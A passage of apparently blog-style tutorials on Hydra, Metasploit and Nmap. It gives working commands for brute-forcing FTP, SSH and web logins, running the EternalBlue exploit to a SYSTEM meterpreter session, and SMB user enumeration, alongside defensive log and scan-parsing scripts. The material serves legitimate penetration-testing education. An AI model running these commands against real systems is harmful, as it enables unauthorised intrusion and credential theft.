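                alerts.append(("success-after-burst", ev["ip"], ev["user"]))
            continue
        q.append(ev["ts"])
        if len(q) >= threshold and ev["ip"] not in alerted:
            alerted.add(ev["ip"])
            alerts.append(("burst", ev["ip"], len(q)))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(*alert)
```

The "invalid user" lines are the giveaway for a user list being sprayed; a single source cycling through names that do not exist on the box is not someone mistyping their password.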

Brute Forcing FTP

FTP is a protocol for transferring files and can also be subject to brute force attacks by Hydra. The syntax will be exactly the same as RDP and SSH. Just replace the protocol for FTP. You will notice a pattern start to emerge for basic network services. There is a lot more to Hydra and you can fine-tune your attacks to be more specific. To perform a brute force attack against FTP:

sudo hydra -L username.txt -P passwords.txt -F ftp://10.0.2.5 -V
Brute Forcing FTP

Brute Forcing Web Applications

You can also brute force web applications. However, the syntax to do so is a bit more complicated. You would start as we have done previously by specifying the username and password wordlist. However, you now need to specify the type of web attack whether it’s an “http-post-form” or “http-get-form” or whether it’s using basic authentication. Then you need to specify the path to the file to attack. Next, you need to specify the parameters to attack (username and password). Furthermore, you need to specify placeholders for the user and pass variables. Finally, you need to specify any cookies. You can see an example of this below:

hydra -L users.txt -P password.txt 10.0.2.5  http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
Damn Vulnerable Web App

Hydra Graphical User Interface

There is a graphical user interface for Hydra. To launch it you need to run the xhydra command. If you prefer GUIs then this could be your preferred method of using hydra. Personally, I prefer using the command line; I genuinely find it easier to configure than the GUI.

Xhydra Gui

Tools: Metasploit

Dear friend, welcome to HaXeZ where today we’re talking about Metasploit. The Metasploit framework is an essential tool for any aspiring hacker or penetration tester. It comes preinstalled on many penetration testing distributions including Kali Linux. It is a framework that allows the user to select from a plethora of powerful tools. Furthermore, the user can then configure those tools with various options including the target’s IP address and port number.

Initializing Metasploit

As mentioned previously, several security-focused Linux distributions come with Metasploit preinstalled. However, you might need to initialize the database on first use. You can use the PostgreSQL database for many things including workspaces. Executing the ‘msfdb init’ command will initialize the Metasploit database.

┌──(kali㉿kali)-[~]
└─$ sudo msfdb init
[+] Starting database
[+] Creating database user 'msf'
[+] Creating databases 'msf'
[+] Creating databases 'msf_test'
[+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml'
[+] Creating initial database schema
msfdb init

Launching Metasploit

Metasploit can be launched using the ‘msfconsole’ command. It may take a moment, but eventually, it will load. Keep an eye out for the unique ASCII art each time you load the tool, especially the goose… HONK.

┌──(kali㉿kali)-[~]
└─$ msfconsole                                                                                                                            
  Metasploit Park, System Security Interface
  Version 4.0.5, Alpha E
  Ready...
       =[ metasploit v6.1.41-dev-                         ]
+ -- --=[ 2216 exploits - 1171 auxiliary - 397 post       ]
+ -- --=[ 616 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Display the Framework log using the 
log command, learn more with help log
msf6 > 
Metasploit MSF Console

Types Of Modules

Auxiliary – Auxiliary tools or modules are tools that don’t necessarily exploit the target host. These tools include scanners, fuzzers, and others. For example, some auxiliary tools can perform user enumeration through various services like SMTP.

Exploit – You can use exploit tools for exploiting a target. A buffer overflow is one example of an exploit tool. Buffer overflows work by sending specially crafted packets to the host. The packet exceeds the amount of data that the target was expecting. This then allows for the execution of additional code.

Post-Exploitation – A post-exploitation tool is just that, it’s a tool that you run against the target once exploited. This could be to gather more information about the target such as finding ways to elevate your privileges on the target.

Payload – Payloads allow you to interact with a target host once it has been exploited. There are many payloads such as reverse TCP shells. One popular payload is Meterpreter. Meterpreter payloads offer advanced functionality.

Searching For Modules

The vast number of tools available through Metasploit is what makes it so powerful. Imagine you’ve just finished scanning a target with Nmap and found that a particular Windows server is vulnerable to MS17-010 (Eternal Blue). Wouldn’t it be great if there was a single place where you could search for tools that could exploit your target? There is, and this is it. Using the search command you can search for specific vulnerabilities and, if Metasploit has a module for one, it will find it, as you can see from the example below.

msf6 > search ms17-010
Matching Modules
================
   #  Name    Disclosure Date  Rank     Check  Description
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce

Configuring Modules

While there may be more options than the options I’m about to demonstrate, the options for a tool will have a similar structure. The MS17-010 exploit has a number of options which you can see below. The tool can also be configured with specific payloads. These payloads can be seen by using the show payloads command. Furthermore, some options are specific to the host you’re using. The LHOST and LPORT options are for specifying where you would like reverse shells to connect back to.

Metasploit Configuring Tools

Executing Modules

So you have configured your module with the target’s IP address and port. You have selected your payload and are ready to exploit the target. What’s next? In order to run your module, you can use either the run or exploit commands. What’s the difference between run and exploit? None. Run is an alias of exploit. I’ve heard people say that they are different. That run should be used for running auxiliary tools and exploit for exploitation tools. Use whichever command you prefer provided it gets the job done.

msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 10.0.2.15:4444 
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 
Metasploit Exploit Module

Metasploit Sessions

Sessions are ways to manage your connections to various targets. Successfully exploiting a target will automatically create a session. They are particularly useful when you are using multiple modules. For instance, If you have got a meterpreter session opened up but you want to use a post exploitation module then you can use the background command to return to Metasploit while keeping the session active. Furthermore, once you have found a post-exploitation module you can use the set session command to tell it to run against that session. Please see the video at the bottom of the page for a demonstration of using sessions.

msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -l
Active sessions
===============
  Id  Name  Type                     Information                     Connection
  --  ----  ----                     -----------                     ----------
  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ HARIS-PC  10.10.14.10:4444 -> 10.10.10.40:49161  (10.10.10.40)
Metasploit Sessions

Metasploit Workspaces

Workspaces are ways to separate your data. For example, if you were targeting two different organizations like the UK Conservative party and The SUN newspaper (Disclaimer – Examples only for comedic effect, this is not a form of encouragement). You would need a way to keep the data separate while you’re working on a way to exploit them. This is where the database comes in. Workspaces utilize the database to logically separate all data into those various workspaces. In order to create a workspace, you need to use the ‘workspace -a name-of-workspace’ command. You can view all your workspaces including your current active workspace by running the ‘workspace’ command. The workspace with the asterisk next to it is your current active workspace. To switch between workspaces just type workspace followed by the workspace name.

Metasploit Workspaces

Conclusion

There is far more to Metasploit than I have covered in this article. To cover everything would require writing a whole book which many people have done. My aim here is to provide a brief overview of the tool and some of the basic functionality. If I’ve piqued your curiosity then download a fresh copy of Kali Linux or Parrot OS and have a tinker. There are many more features to explore including a friendly web interface. Please remember that attempting to hack into a system that you do not have permission to target will likely land you in a bit of trouble. There are plenty of legal ways to test out these tools in an environment purposely built to do so. Please see my other article on Hacking Legally for more information.

Tools: Nmap

Dear friend, welcome to HaXeZ where today I’m going to be talking about the network mapping tool Nmap. Nmap is a network scanner created by Gordon Lyon. It can be used to discover hosts on a network by sending packets to those hosts and then analyzing the responses. In other words, it can help you map out a target network. As a result, Nmap, along with other tools like Masscan, is an essential tool for your ethical hacking toolkit. I use it on almost every engagement.

Nmap Host Discovery

As mentioned previously, Nmap can be used to discover hosts on a network. This can be done in a number of ways, but the most common is known as a ping sweep. A ping sweep does exactly what the name says: it pings every host in the specified range and waits for a response to see whether the host is online.

sudo nmap -sP 10.10.10.0-255

This can also be done without DNS resolution.

sudo nmap -sP 10.10.10.0-255 -n

However, this method isn’t foolproof, as hosts could have ICMP disabled, meaning that they won’t respond to pings.

Nmap Ping Sweep

Nmap TCP Port Scan

The Nmap tool can also scan hosts and determine which TCP ports are open. This is done by initiating a three-way handshake with the host and analyzing the response. You can specify which ports to scan, or let it scan only the top 100 or 1000 most common ports. Additionally, you can add service version detection to the scan with the ‘-sV’ argument.

sudo nmap -sT -sV -p0- 10.10.10.10
Nmap TCP Scan

Nmap UDP Port Scan

Moreover, Nmap can also perform a UDP scan against the hosts. However, because UDP is a connectionless protocol, where the sender keeps transmitting regardless of whether the host has responded, Nmap has to wait on timeouts and retransmissions, so it can take a long time to determine whether a port is open.

sudo nmap -sU -p0- 10.10.10.10

Nmap Scripting Engine

One of the most powerful features of Nmap is its scripting engine. If you’re just starting out in computing or cyber, you could be forgiven for not knowing about it. Nmap is far more than a network scanner; it is a complete penetration testing framework. If you bring up your terminal and type in:

sudo locate '*.nse'
Locate NSE Scripts

You can see the huge number of scripts available for you to use against your targets. These scripts range from purely informational to exploitative. The script database (the index Nmap uses to find scripts by name and category) can be updated by running the following command.

sudo nmap --script-updatedb

SSL Scripts

One thing that I do frequently on an engagement is test the configuration of the SSL certificate. This helps to ensure that all communication sent to and from the host is done securely. Furthermore, it also helps to ensure that no specially crafted packets can be sent to the host to retrieve sensitive information.

sudo nmap --script ssl-cert -p 443 haxez.org

The command below can be used to enumerate the SSL ciphers and check for weak ones.

sudo nmap -sV --script ssl-enum-ciphers -p 443 haxez.org
Nmap SSL Certificate Script
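The ping sweep, the port scans and the ssl-enum-ciphers script above all produce output you still have to read through by hand. On a real engagement you would save that output with ‘-oX’ and triage it with a script. The following is an added example, not code from the original post or from the Nmap project: it parses a constructed XML document in the shape of ‘nmap -sV --script ssl-enum-ciphers -oX’ output (the addresses, versions and cipher results are made up) and pulls out the live hosts, the open ports with their detected services, and any cipher suites or warnings that ssl-enum-ciphers graded below an acceptable level. The function names and the grade threshold are the example’s own choices.

```python
"""Triage Nmap XML output: live hosts, open ports and weak TLS ciphers.

Added example (not from the original post or the Nmap project). SAMPLE_XML is a
constructed report in the shape of `nmap -sV --script ssl-enum-ciphers -oX -` output;
every address, version and cipher result in it is made up.
"""
import xml.etree.ElementTree as ET

SAMPLE_XML = """<nmaprun scanner="nmap" args="nmap -sV --script ssl-enum-ciphers -oX - 10.10.10.0/30">
  <host>
    <status state="up" reason="echo-reply"/>
    <address addr="10.10.10.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="8.2p1"/>
      </port>
      <port protocol="tcp" portid="443">
        <state state="open" reason="syn-ack"/>
        <service name="https" product="nginx" version="1.18.0"/>
        <script id="ssl-enum-ciphers" output="(omitted)">
          <table key="TLSv1.0">
            <table key="ciphers">
              <table>
                <elem key="name">TLS_RSA_WITH_3DES_EDE_CBC_SHA</elem>
                <elem key="strength">C</elem>
              </table>
            </table>
            <table key="warnings">
              <elem>64-bit block cipher 3DES vulnerable to SWEET32 attack</elem>
            </table>
          </table>
          <table key="TLSv1.2">
            <table key="ciphers">
              <table>
                <elem key="name">TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256</elem>
                <elem key="strength">A</elem>
              </table>
            </table>
          </table>
          <elem key="least strength">C</elem>
        </script>
      </port>
      <port protocol="tcp" portid="445">
        <state state="filtered" reason="no-response"/>
      </port>
    </ports>
  </host>
  <host>
    <status state="down" reason="no-response"/>
    <address addr="10.10.10.11" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_nmap_xml(text):
    """Parse an Nmap XML report (as written by -oX) and return the <nmaprun> root."""
    return ET.fromstring(text)


def host_addr(host):
    """Address Nmap reported for a <host> element."""
    return host.find("address").get("addr")


def live_hosts(root):
    """Addresses reported as up: the result a ping sweep gives you."""
    return [host_addr(h) for h in root.iter("host") if h.find("status").get("state") == "up"]


def open_ports(root):
    """(addr, protocol, port, service) for every port in state 'open'.

    Filtered and closed ports are skipped, as are UDP 'open|filtered' guesses."""
    found = []
    for host in root.iter("host"):
        for port in host.iter("port"):
            if port.find("state").get("state") != "open":
                continue
            svc = port.find("service")
            parts = [svc.get(k) for k in ("name", "product", "version")] if svc is not None else []
            found.append((host_addr(host), port.get("protocol"), int(port.get("portid")),
                          " ".join(p for p in parts if p) or "unknown"))
    return found


def weak_tls(root, worst_acceptable="B"):
    """Findings from ssl-enum-ciphers: suites graded worse than worst_acceptable plus warnings.

    Nmap grades suites A (best) to F (worst), so a grade letter greater than the
    threshold letter means a weaker suite. The threshold is this example's choice."""
    findings = []
    for host in root.iter("host"):
        for port in host.iter("port"):
            portid = int(port.get("portid"))
            for script in port.findall("script[@id='ssl-enum-ciphers']"):
                for proto in script.findall("table"):  # one <table> per TLS version
                    version = proto.get("key")
                    for suite in proto.findall("table[@key='ciphers']/table"):
                        grade = suite.findtext("elem[@key='strength']")
                        if grade and grade > worst_acceptable:
                            name = suite.findtext("elem[@key='name']")
                            findings.append((host_addr(host), portid, version, f"{name} graded {grade}"))
                    for warn in proto.findall("table[@key='warnings']/elem"):
                        findings.append((host_addr(host), portid, version, "warning: " + (warn.text or "")))
    return findings


if __name__ == "__main__":
    report = parse_nmap_xml(SAMPLE_XML)
    print("live hosts:", live_hosts(report))
    for entry in open_ports(report):
        print("open:", entry)
    for entry in weak_tls(report):
        print("tls finding:", entry)
```

Run it against a real report by replacing SAMPLE_XML with the contents of the file you wrote with ‘-oX’. The filtered port 445 and the host that was down never appear in the results, and the TLSv1.2 AES-GCM suite passes the default ‘B’ threshold while the TLSv1.0 3DES suite and its SWEET32 warning are reported.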

DNS Zone Transfer Script

There is also a script that can perform DNS zone transfers. While there are other tools like dig and fierce that have a far less complex syntax, if you’re in a pinch and only have Nmap then it’s nice to know the option is there. This can be done by running the following command.

sudo nmap --script dns-zone-transfer.nse --script-args dns-zone-transfer.domain=zonetransfer.me -p53 nsztm1.digi.ninja

So, if you’re on an engagement and you notice that TCP port 53 is open, you could grab an absolute wealth of information by performing a DNS zone transfer.

Nmap DNS Zone Transfer

SMB Share Enumeration

Imagine you’ve stumbled into a network and you’ve scanned a host and noticed that port 445 is open. You know that this is the port for Server Message Block or SMB for short. You also know that this port is used to share files and folders/directories across the network. Wouldn’t it be great if there was a way to see what shares were being shared? Well, there’s a script for that.

nmap --script smb-enum-shares.nse -p445 192.168.56.103

SMB User Enumeration

OK, so you now know what the shares are, but you don’t know any users on the system who would have the privileges to access them. Well, there is a script for that too, which allows you to enumerate the users of the system via SMB.

nmap --script smb-enum-users.nse -p445 192.168.56.103
Nmap SMB User Enumeration

FTP Brute

So you now have a list of usernames, but what do you do with them? Are there any other services that you can see? What’s that? It’s running FTP? Why not brute force that service with Nmap’s FTP brute-force script.

sudo nmap --script ftp-brute -p21 192.168.56.103 --script-args userdb=ftp_defuser.lst,passdb=ftp_defuser.lst
Nmap FTP Brute Force

SSH Brute

You notice another box, or the same box, is running the remote management protocol SSH. You have a list of users and some passwords which you got from the FTP service. Why not use that wordlist to attack the SSH login too?

sudo nmap -p 22 --script ssh-brute --script-args userdb=/usr/share/legion/wordlists/ssh-user.txt,passdb=/usr/share/legion/wordlists/ssh-password.txt 192.168.56.103
Nmap SSH Brute

Other Arguments

Increase Verbosity

There are some other arguments that could help you with your scans too. If you wanted to see exactly what Nmap is doing then you could increase the verbosity.

add -v1, -v2 or -v3

Increase Speed

Or, if Nmap is running too slowly, you could increase the speed by adding a -T4 argument to your scan. Be careful though, as some systems with minimal resources might be offended by your scan and decide to crash due to resource exhaustion.

add -T1, -T2, -T3 or -T4

Conclusion

There are so many other types of scans, like SYN scans and Xmas scans, that I could talk about. I could spend weeks talking about all the different scripts available. I don’t want to make this article too long though. Hopefully, I’ve covered enough to get you started with Nmap and to realize its enormous potential. I use it on almost every test that I do simply because it has almost everything I need. That isn’t to say I don’t verify the results with other tools, but it is usually my starting point on any engagement once the passive reconnaissance is out of the way.

I’ve created a basic Nmap cheat sheet which you can download here.